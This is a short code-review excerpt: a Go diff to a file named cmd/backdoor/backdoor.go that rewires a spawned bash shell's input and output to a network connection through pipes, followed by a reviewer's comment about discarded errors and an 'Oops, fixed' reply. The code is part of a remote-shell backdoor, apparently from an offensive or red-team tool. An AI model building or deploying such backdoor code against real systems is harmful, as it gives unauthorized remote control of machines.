cmd/backdoor/backdoor.go

```diff
@@ -62,9 +63,23 @@ func main() {
 				"TERM=xterm-256color",
 				"SHELL=/bin/bash",
 			}
-			cmd.Stdin = conn
-			cmd.Stdout = conn
-			cmd.Stderr = conn
+
+			stdin, _ := cmd.StdinPipe()
+			if err != nil {
+				conn.Write([]byte(fmt.Sprintf("Failed to create pipe to stdin: %s", err)))
+			}
+			stdout, _ := cmd.StdoutPipe()
+			if err != nil {
+				conn.Write([]byte(fmt.Sprintf("Failed to create pipe to stdout: %s", err)))
+			}
+			stderr, _ := cmd.StderrPipe()
+			if err != nil {
```

Comment:
This never triggers, as you discard the error on the line above. Same for the other 2 pipes.

Reply:
Oops, fixed.